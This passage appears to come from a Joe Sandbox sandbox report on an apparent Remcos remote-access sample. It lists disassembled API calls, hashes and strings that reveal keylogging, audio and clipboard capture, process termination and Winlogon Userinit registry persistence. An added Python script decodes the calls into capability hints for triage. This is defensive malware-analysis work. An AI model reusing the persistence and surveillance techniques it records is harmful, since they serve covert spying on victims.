                                                • Opcode Fuzzy Hash: 70bc603018a4d6fb02e188bbb681361e592b60785a331a472954851439aa302a
                                                • Instruction Fuzzy Hash: CAF0DF3650012FABCF04EF94DC48CEE7B78FB08606B008469F916921A0EB70AA15CB94
                                                APIs
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                • SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                                • String ID:
                                                • API String ID: 3911305588-0
                                                • Opcode ID: 6921bf9f74ecac3d163fba166c7612fa00b2cbb12c7883d47c75d2523de36686
                                                • Instruction ID: b8639b4c3f5584123d4eb6d63a846cbe88495f67726950cc463a40c31f3fc01a
                                                • Opcode Fuzzy Hash: 6921bf9f74ecac3d163fba166c7612fa00b2cbb12c7883d47c75d2523de36686
                                                • Instruction Fuzzy Hash: DCF08235400299EFCB15EF60D448AD67FACAF05345F44C86AE58242961D774F648CBA8
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D607
                                                • atoi.MSVCRT(00000000), ref: 0040D60E
                                                  • Part of subcall function 00411221: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041122E
                                                  • Part of subcall function 00411221: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041123C
                                                  • Part of subcall function 00411221: CloseHandle.KERNEL32(00000000), ref: 00411248
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                                • String ID:
                                                • API String ID: 1377568529-0
                                                • Opcode ID: c519c35377801fe86eac393eca2f91835084e6fc0f5292eb7c3139e0f5ea162f
                                                • Instruction ID: 26380ce70336d899dab22226d7e487bdf8044e3c9a5db75cebfd6218688f75aa
                                                • Opcode Fuzzy Hash: c519c35377801fe86eac393eca2f91835084e6fc0f5292eb7c3139e0f5ea162f
                                                • Instruction Fuzzy Hash: 09E039329041058BCB04ABA2EC1A9ED7724FB50706B10487AE102E20E0EE3C86418B08
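                                                The API listings above (the waveInPrepareHeader/waveInAddBuffer pair, the RegOpenKeyEx/RegQueryValueEx sequences against 80000002 and 80000000, the OpenClipboard/GetClipboardData(00000001) sequence and the atoi -> OpenProcess(00000001) -> TerminateProcess chain) show raw hex stack values whose meaning depends on the Windows constants behind them. The script below is an added example, not part of the Joe Sandbox report and not code from the Remcos sample: it parses lines in the report's `Name.MODULE(args), ref: addr` form, labels the constants that are unambiguous for the API in question (root keys and KEY_* access masks for Reg* calls, CF_TEXT for GetClipboardData, PROCESS_TERMINATE for OpenProcess) and groups the observed calls into capability hints. The sample lines are copied from the entries above; the capability names and the rule that a hint fires only when its required API is present are the example's own choices. Because the report's argument slots are raw stack contents (RegOpenKeyExA is shown with six values although the API takes five), constants are labelled wherever they appear rather than by parameter position.

```python
"""Decode the 'APIs' entries of a Joe Sandbox function listing into capability hints.

Added example, not part of the Joe Sandbox report or of the Remcos sample itself.
Constant names come from the Windows SDK (winreg.h, winuser.h, winnt.h); the
capability labels are this example's own triage vocabulary.
"""
import re
from typing import Dict, List, Optional

# Constructed input: lines copied from the "APIs" blocks of the report above.
REPORT_LINES = [
    "• waveInPrepareHeader.WINMM(020F1298,00000020,?,?,00401465,00000000), ref: 00401508",
    "• waveInAddBuffer.WINMM(?,00000020,?,?,00401465,00000000), ref: 0040151E",
    "• RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040A8AE",
    "• RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000000,?,00000400), ref: 0040A8CB",
    "• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040A920",
    "• OpenClipboard.USER32(00000000), ref: 00405F2E",
    "• GetClipboardData.USER32(00000001), ref: 00405F3A",
    "• CloseClipboard.USER32 ref: 00405F42",
    "  • Part of subcall function 00411221: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041122E",
    "  • Part of subcall function 00411221: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041123C",
]

# Name.MODULE(arg,arg,...), ref: ADDR  -- the argument list is optional (see CloseClipboard above)
ENTRY_RE = re.compile(
    r"^(?P<api>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SUBCALL_PREFIX = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")

ROOT_KEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
PROCESS_ACCESS_BITS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                       0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                       0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION"}
# tag -> (APIs that must be present for the tag to fire, APIs reported alongside them)
CAPABILITIES = {
    "audio capture (waveIn*)": ({"waveInAddBuffer"}, {"waveInOpen", "waveInPrepareHeader", "waveInStart"}),
    "clipboard read": ({"GetClipboardData"}, {"OpenClipboard", "CloseClipboard"}),
    "process termination by PID": ({"TerminateProcess"}, {"OpenProcess"}),
    "registry value query": ({"RegQueryValueExA", "RegQueryValueExW"}, {"RegOpenKeyExA", "RegOpenKeyExW"}),
}


def decode_key_access(value: int) -> Optional[str]:
    """Name a REGSAM mask if every set bit is accounted for; otherwise None."""
    names, rest = [], value
    if rest & 0x20019 == 0x20019:          # KEY_READ is itself a composite mask
        names.append("KEY_READ")
        rest &= ~0x20019
    for bit, name in ((0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY")):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    return "|".join(names) if names and rest == 0 else None


def decode_process_access(value: int) -> Optional[str]:
    """Name an OpenProcess access mask if every set bit is a known PROCESS_* flag."""
    names = [name for bit, name in PROCESS_ACCESS_BITS.items() if value & bit]
    covered = sum(bit for bit in PROCESS_ACCESS_BITS if value & bit)
    return "|".join(names) if names and covered == value else None


def decode_arg(api: str, raw: str) -> str:
    """Annotate a raw hex stack value with a constant name where the API makes it unambiguous."""
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", raw):
        return raw                         # '?' means the sandbox could not recover the slot
    value, label = int(raw, 16), None
    if api.startswith("Reg"):
        label = ROOT_KEYS.get(value) or decode_key_access(value)
    elif api == "GetClipboardData":
        label = CLIPBOARD_FORMATS.get(value)
    elif api == "OpenProcess":
        label = decode_process_access(value)
    return f"{raw}={label}" if label else raw


def parse_entry(line: str) -> Optional[Dict]:
    """Parse one bullet of an 'APIs' block; returns None for lines that are not call entries."""
    text = SUBCALL_PREFIX.sub("", line.strip().lstrip("•").strip())
    m = ENTRY_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def tag_capabilities(entries: List[Dict]) -> Dict[str, List[str]]:
    """Group observed APIs into triage hints; a hint fires only if one of its required APIs is present."""
    seen = {e["api"] for e in entries}
    tags = {}
    for tag, (required, related) in CAPABILITIES.items():
        if seen & required:
            tags[tag] = sorted(seen & (required | related))
    return tags


def triage(lines: List[str]) -> Dict:
    """Parse report lines, decode their arguments and summarise the capabilities they imply."""
    entries = [e for e in (parse_entry(ln) for ln in lines) if e]
    for e in entries:
        e["decoded"] = [decode_arg(e["api"], a) for a in e["args"]]
    return {"entries": entries, "capabilities": tag_capabilities(entries)}


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    for e in result["entries"]:
        print(f'{e["ref"]}  {e["api"]}({", ".join(e["decoded"])})')
    for tag, apis in result["capabilities"].items():
        print(f"[{tag}] {', '.join(apis)}")
```

                                                Running it over the copied lines yields the four hints (audio capture, clipboard read, process termination by PID, registry value query) and decodes, for instance, 00020119 as KEY_READ|KEY_WOW64_64KEY and 80000000 as HKEY_CLASSES_ROOT. A mask with an unrecognised bit is left as its raw hex value rather than guessed, which keeps the decoder honest when a report shows stack garbage in an argument slot.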
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D241
                                                • atoi.MSVCRT(00000000), ref: 0040D248
                                                  • Part of subcall function 004041EA: __EH_prolog.LIBCMT ref: 004041EF
                                                  • Part of subcall function 004041EA: closesocket.WS2_32(?), ref: 00404231
                                                  • Part of subcall function 004041EA: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,00403F34,00000000), ref: 00404243
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@H_prologTerminateThreadatoiclosesocket
                                                • String ID:
                                                • API String ID: 3456773717-0
                                                • Opcode ID: caa45e012d3f6e01c16fbff2091330165b84fb76ca753fddd0fbff1317e4085b
                                                • Instruction ID: b0252f88482eed145658a90fd125d1444de0018e56bb530a97d103f32e5f4b7c
                                                • Opcode Fuzzy Hash: caa45e012d3f6e01c16fbff2091330165b84fb76ca753fddd0fbff1317e4085b
                                                • Instruction Fuzzy Hash: 6CE039365001058BCB04AFA2EC1A9ED7724FB60706B10487BE102E20E0EE3886418B08
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • exit.MSVCRT ref: 0040DF1F
                                                • Sleep.KERNEL32(00000064), ref: 0040DF31
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                                • String ID:
                                                • API String ID: 772260455-0
                                                • Opcode ID: fd96720fa353685945af39df0368ced169ec12ce97ec13dac9ef4599e36da872
                                                • Instruction ID: 693ee0d68741e0e3129761a9d3621558fc12d3720b86c849e1c678a808bb8cd3
                                                • Opcode Fuzzy Hash: fd96720fa353685945af39df0368ced169ec12ce97ec13dac9ef4599e36da872
                                                • Instruction Fuzzy Hash: CBE0ED35A041158AC705FFA1EC596DD7720FB11706F10C47AE103A50E1DA789A098A59
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00411267
                                                • GetCurrentThread.KERNEL32 ref: 0041126A
                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00411271
                                                • DuplicateHandle.KERNEL32(00000000), ref: 00411274
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Current$Process$DuplicateHandleThread
                                                • String ID:
                                                • API String ID: 3566409357-0
                                                • Opcode ID: 2ab43190f5b604454cf5a352529c051b1c01f207935ed87bb31ccec0189af06f
                                                • Instruction ID: 38d7d7bcd10e3e7f94af841772d4cdbd04b5f0e59b17d2760293204ebdb8a843
                                                • Opcode Fuzzy Hash: 2ab43190f5b604454cf5a352529c051b1c01f207935ed87bb31ccec0189af06f
                                                • Instruction Fuzzy Hash: 81D09E71940218B7DD106BE5AC0EFC63F5CDB09772F108421F60896090C6A5D5408AA4
                                                APIs
                                                • waveInStop.WINMM ref: 0040DE87
                                                • waveInClose.WINMM ref: 0040DE93
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$CloseStop
                                                • String ID:
                                                • API String ID: 575602608-0
                                                • Opcode ID: f931c9ff3249c7038e740fe15d5dd0a5bb43cb1608e01f55e5f006e2d1b7183b
                                                • Instruction ID: 369f43e0de260629e964fdaa4196c70bfe90d721fc10d047b7ad9bf77e98eea4
                                                • Opcode Fuzzy Hash: f931c9ff3249c7038e740fe15d5dd0a5bb43cb1608e01f55e5f006e2d1b7183b
                                                • Instruction Fuzzy Hash: 9AE0B6361000069BD709EF65EDAD5DC7B70FB21306B5484BAE503E20B1DB799A85CB19
                                                APIs
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040AC91
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040ACAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                                • String ID: )A
                                                • API String ID: 4160275866-2712435313
                                                • Opcode ID: e1fbd969bfa8847527ac59f6f49a225000bc0d3961d5c8d419422c7e4b0151a1
                                                • Instruction ID: 90b2c34663bfede1f81ad504adb22b5c1fc9071e250d967feb13d94e9b5027c6
                                                • Opcode Fuzzy Hash: e1fbd969bfa8847527ac59f6f49a225000bc0d3961d5c8d419422c7e4b0151a1
                                                • Instruction Fuzzy Hash: 09F0627180010EAFCF01AFA4DD45CEE3B35BB04308F044469F925220A1E636D665DF54
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00405ECF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                • String ID: [LCtrl] $ [RCtrl]
                                                • API String ID: 4257247948-618823999
                                                • Opcode ID: 48c17c4288359509434eccdcf86bbe790992d5d7b660cafcfd6c52e29f338ef6
                                                • Instruction ID: 0fa1c646a68d738d294a307aeb2d6c86b711834aa80b4c3109dba0da690a6adc
                                                • Opcode Fuzzy Hash: 48c17c4288359509434eccdcf86bbe790992d5d7b660cafcfd6c52e29f338ef6
                                                • Instruction Fuzzy Hash: 2FE092313046083FE604B76DC807ABF3A6CE780741F5000AAE422E32C5EAB9AF0446DB
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wcscmp
                                                • String ID: {@
                                                • API String ID: 3392835482-2098953823
                                                • Opcode ID: d95ec0bb8266be435ecca583382595df1105d1b7d4fe147b2264fb43a209f0ff
                                                • Instruction ID: 11a89765c93ce52251f38220843e3e8c64c382c7746bde868679b759e0c325e2
                                                • Opcode Fuzzy Hash: d95ec0bb8266be435ecca583382595df1105d1b7d4fe147b2264fb43a209f0ff
                                                • Instruction Fuzzy Hash: 85E0C23638421A399A042B99FC00AD6BB9CCB007F2B204037FA14E26E0EA95998006C8
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D791
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D79E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                                • String ID: open
                                                • API String ID: 2002754128-2758837156
                                                • Opcode ID: 5091b8a62ed675dbfd12322786ee8a76f7358949c827ea5be40e7ebe8590cae5
                                                • Instruction ID: 88af3973c4d49b6355a75c50cd1fa310c6bf70a69c664a4eb8cb2e9948857b7f
                                                • Opcode Fuzzy Hash: 5091b8a62ed675dbfd12322786ee8a76f7358949c827ea5be40e7ebe8590cae5
                                                • Instruction Fuzzy Hash: 82E0E6B15452197FEF146BA09CD5DFA376C970430AF1044AAB502A20D1DA759E844628
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
